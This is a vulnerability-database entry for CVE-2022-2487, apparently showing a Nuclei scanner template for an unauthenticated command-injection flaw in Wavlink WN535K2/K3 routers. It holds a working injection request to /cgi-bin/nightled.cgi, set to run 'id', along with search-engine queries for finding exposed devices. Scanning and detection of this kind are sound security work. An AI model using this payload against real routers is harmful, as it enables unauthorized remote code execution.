Lucene search

ProjectDiscoveryNUCLEI:CVE-2022-2487

HistoryJul 20, 2022 - 6:16 p.m.

Wavlink WN535K2/WN535K3 - OS Command Injection

2022-07-2018:16:04

ProjectDiscovery

github.com

cve2022

iot

wavlink

router

rce

os command injection

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.4

Confidence

High

EPSS

0.974

Percentile

99.9%

JSON

Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection which affects unknown code in /cgi-bin/nightled.cgi via manipulation of the argument start_hour. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.

id: CVE-2022-2487

info:
  name: Wavlink WN535K2/WN535K3 - OS Command Injection
  author: For3stCo1d
  severity: critical
  description: |
    Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection which affects unknown code in /cgi-bin/nightled.cgi via manipulation of the argument start_hour. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.
  remediation: |
    Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
  reference:
    - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2487
    - https://vuldb.com/?id.204538
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2487
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-2487
    cwe-id: CWE-78
    epss-score: 0.97404
    epss-percentile: 0.99916
    cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wavlink
    product: wl-wn535k2_firmware
    shodan-query:
      - http.title:"Wi-Fi APP Login"
      - http.title:"wi-fi app login"
    fofa-query: title="wi-fi app login"
    google-query: intitle:"wi-fi app login"
  tags: cve,cve2022,iot,wavlink,router,rce,oast
variables:
  cmd: "id"

http:
  - raw:
      - |
        @timeout: 10s
        POST /cgi-bin/nightled.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        page=night_led&start_hour=;{{cmd}};

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "uid="
          - "gid="
          - "nightStart"
        condition: and

      - type: word
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d5efea1d7e0aebaf8dcf58938cef6794ce2b8e92534ab5030ce01c9f54fa46570220668b520a1f400bed5e9f77206b98c2c7a3bfdec16b01741ff05a4acf9336aa76:922c64590222798bb761d5b6d8e72950

References

cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2487

github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md

nvd.nist.gov/vuln/detail/CVE-2022-2487

vuldb.com/?id.204538

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.4

Confidence

High

EPSS

0.974

Percentile

99.9%

JSON

Related for NUCLEI:CVE-2022-2487